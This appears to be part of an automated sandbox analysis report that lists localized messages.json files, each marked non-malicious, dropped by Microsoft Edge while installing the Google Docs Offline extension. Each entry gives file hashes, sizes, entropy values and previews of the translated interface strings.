                                                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                Malicious:false
